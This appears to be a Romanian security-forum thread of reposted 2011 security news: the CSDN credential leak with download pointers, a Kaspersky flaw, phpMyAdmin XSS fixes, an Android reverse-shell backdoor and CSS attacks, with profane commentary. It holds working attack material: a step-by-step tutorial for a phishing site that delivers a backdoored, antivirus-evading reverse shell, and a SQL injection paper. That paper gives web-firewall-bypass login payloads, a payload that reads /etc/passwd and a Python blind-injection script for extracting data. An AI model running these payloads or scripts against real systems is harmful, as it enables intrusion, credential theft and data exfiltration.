Nytro

China Software Developer Network (CSDN) 6 Million user data Leaked Posted by THN Reporter On 12/21/2011 07:33:00 AM The "Chinese Software Developer Network" (CSDN), operated by Bailian Midami Digital Technology Co., Ltd., is one of the biggest networks of software developers in China. A text file with 6 Million CSDN user info including user name, password, emails, all in clear text leaked on internet. The Download Link (use xunlei to download the file) of the File is available on various social Networks. NowChinese programmers are busy changing their password now. Full archive of 104.9 MB (MD5 = b75678048d100600d3a6c648075636a7) available for Download Now : Here Just did some data ming on CSDN leaked user data. Some interesting findings. Here are the results of Top 100 email providers form 6M CSDN user emails : @qq.com, 1976190 @163.com, 1766919 @126.com, 807893 @sina.com, 351590 @yahoo.com.cn, 205487 @hotmail.com, 202944 Security is important, especially for online service. And NEVER store user password in clear texts. Sursa: China Software Developer Network (CSDN) 6 Million user data Leaked | The Hacker News (THN)

[h=1]Kaspersky Anti-Virus and Internet Security 2012 Vulnerable to Hackers[/h] December 22nd, 2011, 14:41 GMT · By Eduard Kovacs Medium severity vulnerabilities are found in Kaspersky Anti-Virus and Kaspersky Internet Security 2011/2012 which can allow an attacker to crash the complete software process. Researchers from Vulnerability Laboratory found a flaw caused by an invalid pointer corruption when processing a corrupt .cfg file through the Kaspersky exception filters. The bug seems to be located in basegui.ppl and basegui.dll when a cfg file import is processed. A proof of concept vide was also published along with the disclosure. “The PoC is not affected by the import exception-handling & get through without any problems. A invalid pointer write & read allows a local attacker to crash the software via memory corruption. The technic & software to detect the bug in the binary is prv8,” Benjamin Kunz Mejri, Vulnerability Laboratory founder, wrote. It also seems that a local attacker doesn’t need to know any passwords in order to load the malicious configuration file. According to the timeline report provided by Vulnerability Labs, Kaspersky was notified on the issue in December 2010 and responded a month later. The information on the vulnerabilities was not disclosed until a few days ago, but there is no mention of the bug being fixed. A while back, I had the opportunity to have a chat with Benjamin Kunz Mejri on the security issues they discovered and, at the time, he admitted that not everyone appreciates what they’re doing. “There are 2 options for the product vendor ... he hates us because he cannot see his own flaws/mistakes/fails ... or he loves us because he can now see his flaws/mistakes/fails. Nothing between. The most vendors reply very friendly & ask us for disclosure partnership (cooperation) for future bug publications,” he said. I have contacted Kaspersky to see what they have to say on the matter so stay tuned for an update. Sursa: Kaspersky Anti-Virus and Internet Security 2012 Vulnerable to Hackers - Softpedia

[h=1]Untethered jailbreak demonstrated for iOS 5, iOS 5.1[/h] Dec. 22, 2011 (8:25 am) By: Will Shanklin Are you itching for that untethered iOS 5 jailbreak that’s just around the corner? Do you like being teased? If so, you’ll want to check out the video that iOS hacker extraordinaire pod2g has posted. As advertised, it’s a jailbreak and it doesn’t require PC connection after a reboot. The phone in the video is an iPhone 4, not the iPhone 4S. pod2g has also been working on an iOS 5 jailbreak for the A5-running iPad 2 and iPhone 4S, but they’re farther from release. This jailbreak will be for all iOS 5 devices other than those two. That means the iPhone 4, iPhone 3GS, iPod touch 4th generation, and original iPad will be getting in on the untethered action. Most developers hate being pestered for release dates, but pod2g has been generous with progress updates. Last week it sounded like the jailbreak was going through its final days of testing, but he’s had more kinks to work out. He now says that it’s nearly ready for prime time, but also asks for patience, saying that there are “some more days to wait.” An untethered jailbreak for iOS 5 would be a welcomed holiday gift for iOS users. The firmware has been around for a couple of months now. Though it has been jailbreakable from the beginning, it’s a tethered jailbreak, requiring you to connect your device to a PC every time you reboot your device. The untethered jailbreak will remove those chains. As nice as the untethered jailbreak will be, the real prize will be a jailbreak for A5 devices. The iPad 2 and iPhone 4S have thus far proven to be nearly impossible to hack, but pod2g has been making progress on that front too. Last weekend he mentioned that the biggest obstacles were processor cache issues, but he quickly remedied that. The iPhone 4S and iPad 2 jailbreak won’t be release as quickly as the jailbreak in the video, but there’s a good chance pod2g will be releasing it before too long. via pod2g Sursa: Untethered jailbreak demonstrated for iOS 5, iOS 5.1 – Cell Phones & Mobile Device Technology News & Updates | Geek.com

[h=2]Atacuri informatice în 2012: ?inte stabilite, r?zboi cibernetic, amenin??ri mobile [/h]22 12 2011 15:39 Corina Cailean Ce ne va aduce 2012 din punct de vedere al securit??ii informatice? În mare, va trebui s? ne a?tept?m nu doar la o cre?tere extrem? a atacurilor cu ?inte specifice asupra institu?iilor de stat ?i asupra marilor companii, dar este posibil ca din ce în ce mai multe organiza?ii s? fie afectate de incidente informatice. Practic, ?inta principal? a atacatorilor cibernetici o vor constitui guvernele ?i marile corpora?ii din întreaga lume. Pentru noi, ca simpli utilizatori, „c?lcâiul lui Ahile” îl vor constitui telefoanele mobile, sus?in exper?ii Kaspersky Lab, care au realizat un raport de previziuni pentru anul viitor. Alexander Gostev, autorul raportului „Cyberthreat Forecast for 2012”, sus?ine c?, pentru moment, majoritatea incidentelor informatice afecteaz? companiile ?i organiza?iile guvernamentale implicate în fabricarea de armament, opera?iuni financiare sau în activit??i legate de cercetarea în domeniul hi-tech sau în domeniul ?tiin?ei. Anul viitor, vor fi afectate ?i companiile care activeaz? în domenii ca extrac?ia de resurse naturale, energie, transport, alimenta?ie ?i farmaceutice. Din punctul de vedere al utilizatorului „casnic”, e important de re?inut c? printre ?intele predilecte se vor num?ra ?i companiile care furnizeaz? servicii de Internet, precum ?i cele care se ocup? cu securitatea informa?iilor. Atacurile vor fi mai extinse din punct de vedere geografic anul viitor, incluzând Europa Occidental? ?i SUA, ?i vor afecta Europa de Est, Orientul Mijlociu ?i Asia de Sud-Est. Exper?ii Kaspersky Lab prev?d c? infractorii cibernetici î?i vor schimba metodele de atac, pentru a se adapta la competi?ia dintre companiile de securitate IT, ce investigheaz? acest tip de atacuri ?i care ofer? protec?ie împotriva lor. Nivelul crescut de aten?ie la bre?ele de securitate va reprezenta înc? un motiv pentru care atacatorii vor fi nevoi?i s? caute noi instrumente. Metodele conven?ionale de atac, ce implic? ata?amente de e-mail care exploateaz? vulnerabilit??ile din sistem vor deveni din ce în ce mai ineficiente, în timp ce atacurile prin intermediul motoarelor de c?utare (influen?area rezultatelor afi?ate în c?ut?ri online pe anumite subiecte) vor fi mult mai populare. O alt? previziune este legat? de atacurile grupurilor de hackeri activi?ti asupra organiza?iilor de stat ?i companiilor - care vor continua ?i în 2012 ?i vor avea o agend? predominant politic?. Cu toate acestea, „hacktivism-ul” ar putea fi utilizat ca o metod? de divesiune pentru a ascunde alte tipuri de atac. Programele de malware hi-tech, cum sunt Stuxnet ?i Duqu, create cu sprijinul statelor vor r?mâne fenomene unice. Apari?ia lor va fi decis? de tensiunile interna?ionale dintre anumite ??ri, iar conflictele în spa?iul virtual se vor forma în jurul confrunt?rilor tradi?ionale: SUA ?i Israel împotriva Iranului ?i SUA ?i Europa de Vest împotriva Chinei. „Armele” de baz? care sunt construite pentru a distruge date într-un anumit moment, cum sunt „kill switches”, bombe logice etc, vor deveni mai populare deoarece sunt mai u?or de fabricat. Crearea acestor programe poate fi externalizat? c?tre furnizori priva?i utiliza?i de agen?iile militare sau guvernamentale. În multe cazuri, este posibil ca furnizorul s? nu ?tie care sunt scopurile clientului. În ceea ce prive?te amenin??rile pentru telefoane mobile, Kaspersky Lab se a?teapt? ca Google Android s? fie ?inta favorit? pentru pia?a de software periculos, care atac? terminale mobile, precum ?i s? creasc? num?rul de atacuri ce exploateaz? vulnerabilit??i. Este prognozat? ?i apari?ia primelor atacuri mobile de tip drive-by ?i a botnet-urilor mobile. Spionajul mobil se va r?spândi la scar? larg? ?i va include, cel mai probabil, furt de date de pe telefoane mobile ?i urm?rirea anumitor persoane cu ajutorul telefoanelor sau a serviciilor de localizare geografic?. Sursa: Atacuri informatice în 2012: ?inte stabilite, r?zboi cibernetic, amenin??ri mobile PS: E scris de o femeie, nu l-am citit, dar cam asta se propaga prin media.

[h=1]phpMyAdmin 3.4.9 fixes XSS vulnerabilities[/h]22 December 2011, 12:10 Version 3.4.9 of phpMyAdmin has been released, closing two security holes in the open source database administration tool. The update fixes vulnerabilities in the phpMyAdmin setup interface and the export panels in the server, database and table sections that could be exploited for cross-site scripting (XSS) attacks. All 3.4.x versions up to and including 3.4.8 are affected – upgrading to 3.4.9 corrects the issues. Alternatively, patches are provided. The new release also fixes nine other bugs related to navigation, the user interface and the edit functionality. A full list of changes can be found in the release notes and in the project's security advisories. Version 3.4.9 of phpMyAdmin is available to download from the project's site. Hosted on SourceForge, phpMyAdmin source code is licensed under the GPLv2. See also: XSS in export, a phpMyAdmin security advisory. XSS in setup, a phpMyAdmin security advisory. (crve) Sursa: phpMyAdmin 3.4.9 fixes XSS vulnerabilities - The H Open Source: News and Features

Hardware Involved Software Attacks Jeff Forristal jeff.forristal_@_intel.com Abstract Computer security vulnerabilities involving hardware are under-represented within the security industry. With a growing number of attackers, malware, and researchers moving beyond pure software attack scenarios and into scenarios incorporating a hardware element, it is important to start laying a foundation on how to understand, characterize, and defend against these types of hybrid attacks. This paper introduces and details a starting taxonomy of security attacks called hardware involved software attacks, in an effort to further security community awareness of hardware security and its role in upholding the security of the PC platform. Table of Contents Preface ......................................................................................................................................................... 3 PC System Stack: Setting the Stage ............................................................................................................... 3 Focus on the Hardware Layer ................................................................................................................... 5 Forced Migration Down the Stack ............................................................................................................ 6 Hardware Background ................................................................................................................................. 7 How Hardware Facilitates Security Attacks .............................................................................................. 8 Obtaining Hardware Access ...................................................................................................................... 8 Taxonomy of Hardware Involved Software Attacks ..................................................................................... 9 Inappropriate General Access to Hardware............................................................................................ 10 Unexpected Consequences of Specific Hardware Function ................................................................... 11 Hardware Reflected Injection ................................................................................................................. 11 Interference with Hardware Privilege Access Enforcement ................................................................... 13 Access By a Parallel Executing Entity ...................................................................................................... 13 External Control of a Hardware Device .................................................................................................. 14 Incorrect Hardware Use .......................................................................................................................... 14 Where to Go From Here ............................................................................................................................. 15 Appendix A – Publicized Hardware Vulnerabilities ..................................................................................... 15 CVE List of Hardware Involved Software Vulnerabilities ........................................................................ 16 Download: http://www.forristal.com/material/Forristal_Hardware_Involved_Software_Attacks.pdf

[h=2]Backtrack 5: Penetration Testing with Social Engineering Toolkit[/h] Social engineering attacks are one of the top techniques used against networks today. Why spend days, weeks or even months trying to penetrate layers of network security when you can just trick a user into running a file that allows you full access to their machine and bypasses anti-virus, firewalls and many intrusion detection systems? This is most commonly used in phishing attacks today -craft an e-mail, or create a fake website that tricks users into running a malicious file that creates a backdoor into their system. But as a security expert, how could you test this against your network? Would such an attack work, and how could you defend against it? The Backtrack Linux penetration testing platform includes one of the most popular social engineering attack toolkits available. My previous “How-To” on Backtrack 4?s SET has been extremely popular. Well, Backtrack 5?s SET includes a whole slew of new features and I figured it was time to update the tutorial. We will use SET to create a fake website that offers a backdoored program to any system that connects. So here goes… Okay, timeout for a disclaimer: This is for security testing purposes only, never attempt to use any security checks or tools on a network that you do not have the authorization and written permission to do so. Doing so could cost you your job and you could end up in jail. 1. Obtain Backtrack 5 release 1. You can use the LiveCD version, install it on a new system or run it in a Virtual Machine. 2. The first thing you will want to do is update both the Metasploit Framework and the Social Engineering Toolkit to make sure you have the latest version. Update both, restart SET and check updates one more time. 3. Select number 1, “Social Engineering Attacks” 4. Next select 2, “Website Attack Vectors”. Notice the other options available. 5. Then 1, “Java Applet Attack Method”. This will create a Java app that has a backdoor shell in it. 6. Next choose 1, “Web Templates” to have SET create a generic webpage to use. Option 2, “Site Cloner” allows SET to use an existing webpage as a template for the attack webpage. 7. Now choose 1, “Java Required”. Notice the other social media options available. 8. Pick a payload you want delivered, I usually choose 2, “Windows Reverse_TCP Meterpreter”, but you have several to choose from including your own program . Number 13, “ShellCodeExec Alphanum Shellcode” is interesting as it runs from memory, never touching the hard drive, thus effectively by-passing most anti-virus programs. 9. Next choose an encoding type to bypass anti-virus. “Shikata_ga_nai” is very popular, Multi-Encoder uses several encoders, but number 16 is best, “Backdoored Executable”. It adds the backdoor program to a legitimate program, like Calc.exe. 10. Set the port to listen on, I just took the default. Now Backtrack is all set and does several things. It creates the backdoor program, encodes and packs it. Creates the website that you want to use and starts up a listening service looking for people to connect. When done, your screen will look like this: Okay we are all set. Now if we go to a “Victim” machine and surf to the IP address of the “attacker” machine we will see this: If the “Victim” allows this Java script to run, we get a remote session on our attacking machine: You now have access to the victims PC. Use “Sessions -i” and the Session number to connect to the session. Once connected, you can use linux commands to browse the remote PC, or running “shell” will give you a remote windows command shell. That’s it, one bad choice on the victim’s side and security updates and anti-virus means nothing. The “Victim” in this case was a fully updated Windows XP Professional with the top name anti-virus internet security suite installed and updated. They can even surf away or close the webpage, because once the shell has connected the web browser is no longer needed. Most attackers will then solidify their hold on the PC and merge the session into another process effectively making the shell disappear. This is why informing your users about the dangers of clicking on unknown links in e-mails, suspicious web links, online anti-virus messages and video codec updates is critical. It can be very hazardous to your network. The easiest way to stop this type of attack is to simply run the FireFox add-in “Noscript”, also BitDefender AV 2012 seems very, very resilient against these types of attacks. Sursa: https://cyberarms.wordpress.com/2011/12/22/backtrack-5-penetration-testing-with-social-engineering-toolkit/

Armitage Hacking Made Easy Part 1 Author : r45c4l Mail : infosecpirate@gmail.com Twitter Greetz and shouts to the entire ICW team and every Indian hackers Introduction When I started writing this, I thought to keep it short and simple as I am assuming that the readers are atleast a little bit familiar hey Metasploit as well as Armitage. They don't need to know everything, but atleast have an idea about the use and purpose of these tools. When I started writing this, I realized that it's really not possible to cover the vast amount of features and the usability of this tool, so I decided to continue this paper in series. I hope to finish this in part 2 of this paper but again it depends on the demands and requests of the readers if they want to add or go into the detail of any of the topic or functions of this beautiful tool “Armitage”. There must be some mistakes so I request readers to please let me know about those mistakes so that I can correct them and give them a better stuff. My contact details are mentioned above. Download: http://www.exploit-db.com/download_pdf/18255

[h=1]False SQL Injection and Advanced Blind SQL Injection[/h] ######################################################################### # # # Exploit Title: False SQL injection and advanced blind SQL injection # # Date: 21/12/2011 # # Author: wh1ant # # Company: trinitysoft # # Group: secuholic # # # # ### ## # # ###### ###### # # ## ## ### ## # # ## ## # # ### ### # # ### ### # # ### # # ### # # ############ ########### # # ############################ # # ############################## # # ############################# # # # ############################ # # # # #### ############ #### # # # # ##### ########## ##### # # # # ###################### ## # # ## #################### ## # # ## ################## ## # # # ## ################ ## # # # # ## ############## ## # # # ## ## ############ ## ## # # ## ## ########## ## ## # # # ## ######## ## # # # ## ###### ## # # ## #### ## # # ## ## ## # # ## ## # # ## ## # # ### ### # # # ######################################################################### This document is written for publicizing of new SQL injection method about detour some web firewall or some security solution. I did test on a web firewall made in Korean, most SQL injection attack was hit, I will not reveal the maker for cutting its damage. In order to read this document, you have to understand basic MySQL principles. I classified the term "SQL Injection" as 2 meanings. The first is a general SQL Injection, we usually call this "True SQL Injection", and the second is a "False SQL Injection". Though in this documentation, you can know something special about "True SQL Injection" And I mean to say it's true that my method (False SQL Injection) is different from True/False SQL Injection mentioned in "Blind SQL Injection". A tested environment was as follow. ubuntu server 11.04 mysql 5.1.54-1 Apache 2.2.17 PHP 5.3.5-1 A tested code was as follow. <?php /* create database injection_db; use injection_db; create table users(num int not null, id varchar(30) not null, password varchar(30) not null, primary key(num)); insert into users values(1, 'admin', 'ad1234'); insert into users values(2, 'wh1ant', 'wh1234'); insert into users values(3, 'secuholic', 'se1234'); *** login.php *** */ if(empty($_GET['id']) || empty($_GET['password'])){ echo "<html>"; echo "<body>"; echo "<form name='text' action='login.php' method='get'>"; echo "<h4>ID <input type='text' name='id'><br>"; echo "PASS<input type='password' name='password'><br></h4>"; echo "<input type='submit' value='Login'>"; echo "</form>"; echo "</body>"; echo "</html>"; } else{ $id = $_GET['id']; $password = $_GET['password']; $dbhost = 'localhost'; $dbuser = 'root'; $dbpass = 'pass'; $database = 'injection_db'; $db = mysql_connect($dbhost, $dbuser, $dbpass); mysql_select_db($database,$db); $sql = mysql_query("select * from users where id='$id' and password='$password'") or die (mysql_error()); $row = mysql_fetch_array($sql); if($row[id] && $row[password]){ echo "<font color=#FF0000><h1>"."Login sucess"."</h1></u><br>"; echo "<h3><font color=#000000>"."Hello, "."</u>"; echo "<font color=#D2691E>".$row[id]."</u></h3><br>"; } else{ echo "<script>alert('Login failed');</script>"; } mysql_close($db); } ?> First, basic SQL Injection is as follow. ' or 1=1# The code above is general SQL Injection Code, and this writer classified the code as "True SQL Injection". When you log on to some site, in internal of web program, your id and password are identified by some statement used "select id, password from table where id='' and password='', you can easily understand when you think 0 about character single quotation mark. Empty space is same as 0, the attack is possible using = and 0. As a result, following statement enables log on process. '=0# We can apply it in a different way. This is possible as 0>-1 '>-1# Also, this is possible as 0<1 '<1# You don't have to use only single figures. You can use two figures attack as follow. 1'<99# Comparison operation 0=1 will be 0, the following operation result is true because of id=''=0(0=1). '=0=1# Additionally there is some possible comparison operation making the same value each other. '<=>0# Like this, if you use the comparison operation, you can attack as additional manner. '=0=1=1=1=1=1# '=1<>1# '<>1# 1'<>99999# '!=2!=3!=4# In this time, you get the turn on understanding False SQL injection. the following is not attack but operation for MySQL. mysql> select * from users; +-----+-----------+----------+ | num | id | password | +-----+-----------+----------+ | 1 | admin | ad1234 | | 2 | wh1ant | wh1234 | | 3 | secuholic | se1234 | +-----+-----------+----------+ 3 rows in set (0.01 sec) This shows the contents in any table without any problem. The following is the content when you don't input any value in the id mysql> select * from users where id=''; Empty set (0.00 sec) Of course there is not result because id field dosen't have any string. In the truth, I have seen the case that in the MySQL if string field has a 0, the result is true. Based on the truth, following statement is true. mysql> select * from users where id=0; +-----+-----------+----------+ | num | id | password | +-----+-----------+----------+ | 1 | admin | ad1234 | | 2 | wh1ant | wh1234 | | 3 | secuholic | se1234 | +-----+-----------+----------+ 3 rows in set (0.00 sec) If you input 0 in id, All the content is showed. This is the basic about "False SQL Injection". After all, result of 0 makes log on process success. For making the result 0, you need something processing integer, in that time you can use bitwise operations and arithmetic operations. Once I'll show bitwise operation example. Or bitwise operation is well known for any programmer. And as I told you before, '' is 0, if you operate "0 bitwise OR 0", the result is 0. So the following operation succeed log on as the False SQL Injection. '|0# Naturally, you can use AND operation. '&0# This is the attack using XOR '^0# Also using shift operation is enable. '<<0# '>>0# If you apply like those bitwise operations, you can use variable attack methods. '&''# '%11&1# '&1&1# '|0&1# '<<0|0# '<<0>>0# In this time, I will show "False SQL Injection" using arithmetic operations. If the result is 0 using arithmetic operation with '', attack will be success. The following is the example using arithmetic operation. '*9# Multiplication '/9# Division. '%9# Mod '+0# Addition '-0# Subtraction Significant point is that the result has to be under one. Also you can attack as follow. '+2+5-7# '+0+0-0# '-0-0-0-0-0# '*9*8*7*6*5# '/2/3/4# '%12%34%56%78# '/**/+/**/0# '-----0# '+++0+++++0*0# Next attack is it using fucntion. In this document, I can't show all the functions. Because this attack is not difficult, you can use the "True, False SQL Injection" attack with function as much as you want. And whether this attack is "True SQL Injection" or "False SQL Injection" is decided on the last operation after return of function. '<hex(1)# '=left(0x30,1)# '=right(0,1)# '!=curdate()# '-reverse(0)# '=ltrim(0)# '<abs(1)# '*round(1,1)# '&left(0,0)# '*round(0,1)*round(0,1)# Also, you can use attack using space in function name. But you are able to use the space with only some function. '=upper (0)# In this time, SQL keyword is method. This method is also decided as True or False Injection according to case. ' <1 and 1# 'xor 1# 'div 1# 'is not null# admin' order by' admin' group by' 'like 0# 'between 1 and 1# 'regexp 1# Inputting id or password in the field without annotaion is possible about True, False SQL Injection. Normal Web Firewalls filter #, --, /**/, so the method is more effective in the Web Firewalls. ID : '=' PASS: '=' ID : '<>'1 PASS: '<>'1 ID : '>1=' PASS: '>1=' ID : 0'='0 PASS: 0'='0 ID : '<1 and 1>' PASS: '<1 and 1>' ID : '<>ifnull(1,2)='1 PASS: '<>ifnull(1,2)='1 ID : '=round(0,1)='1 PASS: '=round(0,1)='1 ID : '*0*' PASS: '*0*' ID : '+' PASS: '+' ID : '-' PASS: '-' ID :'+1-1-' PASS:'+1-1-' All attacks used in the documentation will be more effective with using bracket when detouring web firewall. '+(0-0)# '=0<>((reverse(1))-(reverse(1)))# '<(8*7)*(6*5)*(4*3)# '&(1+1)-2# '>(0-100)# Let's see normal SQL Injection attack. ' or 1=1# If this is translated in hexdemical, the result is as follow. http://127.0.0.1/login.php?id=%27%20%6f%72%20%31%3d%31%23&password=1234 Like attack above is basically filtered. So that's not good attack, I will try detour filtering using tab(%09) standing in for space(%20). In truth, you can use %a0 on behalf of %09. The possible values are as follow. %09 %0a %0b %0c %0d %a0 %23%0a %23%48%65%6c%6c%6f%20%77%6f%6c%72%64%0a The following is the example using %a0 instead of %20. http://127.0.0.1/login.php?id=%27%a0%6f%72%a0%31%3d%31%23&password=1234 In this time, I will show "Blind SQL injection" attack, this attack can't detour web firewall filtering, but some attacker tend to think that Blind SQL Injection attack is impossible to log on page. So I decided showing this subject. The following attack code can be used on log on page. And the page will show id and password. 'union select 1,group_concat(password),3 from users# This attack code brings /etc/password information. 'union select 1,load_file(0x2f6574632f706173737764),3 from users# Dare I say it without union select statement using Blind SQL injection with and operation is possible. The result of record are three. admin' and (select count(*) from users)=3# Let's attack detouring web firewall using Blind SQL Injection. The following is vulnerable code to Blind SQL Injection. <?php /*** info.php ***/ $n = $_GET['num']; if(empty($n)){ $n = 1; } $dbhost = 'localhost'; $dbuser = 'root'; $dbpass = 'root'; $database = 'injection_db'; $db = mysql_connect($host, $dbuser, $dbpass); mysql_select_db($database,$db); $sql = mysql_query("select * from `users` where num=".$n) or die (mysql_error()); $info = @mysql_fetch_row($sql); echo "<body bgcolor=#000000>"; echo "<h1><font color=#FFFFFF>wh1ant</font>"; echo "<font color=#2BF70E> site for blind SQL injection test</h1><br>"; echo "<h1><font color=#2BF70E>num: </font><font color=#D2691E>".$info[0]."</font></h1>"; echo "<h1><font color=#2BF70E>user: </font><font color=#D2691E>".$info[1]."</font>"; echo "<body>"; mysql_close($db); ?> Basic Blind SQL Injection is as follow on like above. http://127.0.0.1/info.php?num=1 and 1=0 http://127.0.0.1/info.php?num=1 and 1=1 But using = operation is possible for Blind SQL Injection. http://192.168.137.129/info.php?num=1=0 http://192.168.137.129/info.php?num=1=1 Also other operation is possible naturally. http://127.0.0.1/info.php?num=1<>0 http://127.0.0.1/info.php?num=1<>1 http://127.0.0.1/info.php?num=1<0 http://127.0.0.1/info.php?num=1<1 http://127.0.0.1/info.php?num=1*0*0*1 http://127.0.0.1/info.php?num=1*0*0*0 http://127.0.0.1/info.php?num=1%1%1%0 http://127.0.0.1/info.php?num=1%1%1%1 http://127.0.0.1/info.php?num=1 div 0 http://127.0.0.1/info.php?num=1 div 1 http://127.0.0.1/info.php?num=1 regexp 0 http://127.0.0.1/info.php?num=1 regexp 1 http://127.0.0.1/info.php?num=1^0 http://127.0.0.1/info.php?num=1^1 Attack example: http://127.0.0.1/info.php?num=0^(locate(0x61,(select id from users where num=1),1)=1) http://127.0.0.1/info.php?num=0^(select position(0x61 in (select id from users where num=1))=1) http://127.0.0.1/info.php?num=0^(reverse(reverse((select id from users where num=1)))=0x61646d696e) http://127.0.0.1/info.php?num=0^(lcase((select id from users where num=1))=0x61646d696e) http://127.0.0.1/info.php?num=0^((select id from users where num=1)=0x61646d696e) http://127.0.0.1/info.php?num=0^(id regexp 0x61646d696e) http://127.0.0.1/info.php?num=0^(id=0x61646d696e) http://127.0.0.1/info.php?num=0^((select octet_length(id) from users where num=1)=5) http://127.0.0.1/info.php?num=0^((select character_length(id) from users where num=1)=5) If I will show all attack, I have to take much time, So I stopped in this time. Blind SQL Injection is difficult manually, So using tool will be more effective. I will show a tool made python, this is an example using ^(XOR) bitwise operation. In order to make the most of detouring the web firewall, I replaced space with %0a. #!/usr/bin/python ### blind.py ### import urllib import sys import os def put_data(true_url, true_result, field, index, length): for i in range(1, length+1): for j in range(32, 127): attack_url = true_url + "^(%%a0locate%%a0%%a0(0x%x,(%%a0select%%a0%s%%a0%%a0from%%a0%%a0users%%a0where%%a0num=%d),%d)=%d)" % (j,field,index,i,i) attack_open = urllib.urlopen(attack_url) attack_result = attack_open.read() attack_open.close() if attack_result==true_result: ch = "%c" % j sys.stdout.write(ch) break print "\t\t", def get_length(false_url, false_result, field, index): i=0 while 1: data_length_url = false_url + "^(%%a0(select%%a0octet_length%%a0%%a0(%s)%%a0from%%a0users%%a0where%%a0num%%a0=%%a0%d)%%a0=%%a0%d)" % (field,index,i) data_length_open = urllib.urlopen(data_length_url) data_length_result = data_length_open.read() data_length_open.close() if data_length_result==false_result: return i i+=1 url = "http://127.0.0.1/info.php" true_url = url + "?num=1" true_open = urllib.urlopen(true_url) true_result = true_open.read() true_open.close() false_url = url + "?num=0" false_open = urllib.urlopen(false_url) false_result = false_open.read() false_open.close() print "num\t\tid\t\tpassword" fields = "num", "id", "password" for i in range(1, 4): for j in range(0, 3): length = get_length(false_url, false_result, fields[j], i) length = put_data(false_url, true_result, fields[j], i, length) print "" To its regret, the attack test is stopped for no time, if anyone not this writer studies some attack codes additionally, it will be easy for him to develop the attack. # Korean document: http://wh1ant.kr/archives/[Hangul]%20False%20SQL%20injection%20and%20Advanced%20blind%20SQL%20injection.txt [EOF] Sursa: Vulnerability analysis, Security Papers, Exploit Tutorials

Sfinte cacat, nu va bateti joc de aceasta categorie.

Ce pula mea "tutoriale" sunt astea? Nu mai postati toate rahaturile.

[h=1]30 Best Sources For Linux / *BSD / Unix Documentation On the Web[/h]by Vivek Gite on December 21, 2011 Man pages are written by sys-admin and developers for IT techs, and are intended more as a reference than as a how to. Man pages are very useful for people who are already familiar with Linux, Unix, and BSD operating systems. Use man pages when you just need to know the syntax for particular commands or configuration file, but they are not helpful for new Linux users. Man pages are not good for learning something new for the first time. Here are thirty best documentation sites on the web. Link: http://www.cyberciti.biz/tips/linux-unix-bsd-documentations.html

Cati au primit avertisment sau ban pentru ca au postat acolo si nu aveau 10 posturi? Poate 2-3 care au venit cu intrebari si cereri idioate. Nu s-au dat decat probabil cateva avertismente pentru asa ceva, in functie de postul cu pricina. Nu tinem mult la acea regula, insa pana la urma e utila. De ce sa fie toti leecheri sa nu contribuie cu nimic? In primul rand se poate prezenta, de acolo ne facem o idee despre persoana in cauza si poate toleram chiar si o cerere stupida. Apoi, oricine poate posta o stire din IT sau ceva util.

[h=1]Probably the Best Free Security List in the World[/h]Updated 21. December 2011 - 4:27 by ako 1. Introduction / Keys / What's New 2. Realtime Protection 3. Scanners 4. Virus Removal Tools 5. Online Scanners 6. Firewalls 7. HIPS 8. System Hardening-HIPS 9. System Hardening 10. Sandboxing / Virtualization 11. Vulnerability Scanning 12. Browser Security 13. IP-Blocking/Hardening 14. Privacy 15. System Monitoring 16. Network Traffic Monitoring 17. System Cleaning 18. Data Rescue 19. Encrypting 20. Backup 21. System Rescue 22. Miscellaneous 23. Tests & Analysis Tools 24. Vista/Windows 7 Security 25. My Choices and More Link: http://www.techsupportalert.com/content/probably-best-free-security-list-world.htm

ExploitHub is the first legitimate marketplace for validated, non-zero-day exploits Link: https://www.exploithub.com/

[h=4]Securitytube Metasploit Framework Expert ( Armitage )[/h] Description: This video, part of the SecurityTube Metasploit Framework Expert series, introduces Armitage. You'll learn the basic use of Armitage and see a demonstration. This video also covers some of the advanced features: dynamic workspaces, team collaboration, and reporting. Sursa: Securitytube Metasploit Framework Expert ( Armitage ) Da, tutorial despre Armitage...

[h=4]Execute Binary In The Alternate Data Stream[/h]Un truc simplu si posibil util. Description: Since Vista the start-command ist forbidden for ADS. Here a workaround Sursa: Execute Binary In The Alternate Data Stream

[h=4]How Not To Implement Cryptography For The Owasp Top 10[/h] Description: How NOT to Implement Cryptography for the OWASP Top 10 (Reloaded) with Anthony J. Stieber Sursa: How Not To Implement Cryptography For The Owasp Top 10

Backdoor in Android for No-Permissions Reverse Shell Security expert Thomas Cannon working at viaForensics as the Director of R&D has demonstrated a custom-developed app that installs a backdoor in Android smartphones – without requiring any permissions or exploiting any security holes. Thomas built an app which requires no permissions and yet is able to give an attacker a remote shell and allow them to execute commands on the device remotely from anywhere in the world. The functionality they are exploiting to do this is not new, it has been quietly pointed out for a number of years, and was explained in depth at Defcon 18. It is not a zero-day exploit or a root exploit. They are using Android the way it was designed to work, but in a clever way in order to establish a 2-way communication channel. This has been tested on Android versions ranging from 1.5 up to 4.0 Ice Cream Sandwich, and it works in a similar way on all platforms. The application operates by instructing the browser to access a particular web page with specific parameters. This web page, and the server behind it, will, in turn, control the app by forwarding the browser to a URL that starts with a protocol prefix that is registered as being handled by the app, for example app://. This process can then be repeated and in doing so it enables two-way communication. "In this demonstration Android’s power and flexibility were perhaps also its downfall. Other smartphone platforms may not offer the controls we are bypassing at all, and the multi-tasking capabilities in Android allowed us to run the attack almost transparently to the user. This power combined with the open nature of Android also facilitates the customisation of the system to meet bespoke security requirements. This is something we have even been involved in ourselves by implementing a proof of concept Loadable Kernel Module to pro-actively monitor and defend a client’s intellectual property as it passed through their devices. It is no surprise that we have seen adoption of Android research projects in the military and government as it can be enhanced and adapted for specific security requirements, perhaps like no other mobile platform before it." Thomas Cannon said. Sursa: Backdoor in Android for No-Permissions Reverse Shell | The Hacker News (THN)

CSS - The sexy assasin Tactical Exploitation using CSS Old Attacks New Research New Attacks Download: http://www.megaupload.com/?d=2E0FY6BJ De interes: Access DOM attributes using CSS: This example is just a very simple proof of concept -- showing that we can enumerate arbitrary attribute value characters. It performs five positive tests and one negative test. Just to be sure. Now, what happens here? First of all you see an animation, resizing a pack of boxes. This is necessary because of a render bug in Webkit -- but not necessarily important for the attack itself. I just had to implement it because of a faulty dimensioning of boxes applied with external fonts. So -- the essence of the attack is, that we cam map attribute content into the DOM by using CSS :after and content:attr(href) for example. This mapped attribute content can be styled with a custom font. The magic is in those fonts - each font is only supplied with one visible character - and all other characters having zero dimension. That means that only the dimensioned character will be displayed and all others won't. @font-face { font-family: TestS; src: url(test_S.svg#TestS) format("svg"); } @font-face { font-family: TestE; src: url(test_E.svg#TestE) format("svg"); } @font-face { font-family: TestC; src: url(test_C.svg#TestC) format("svg"); } @font-face { 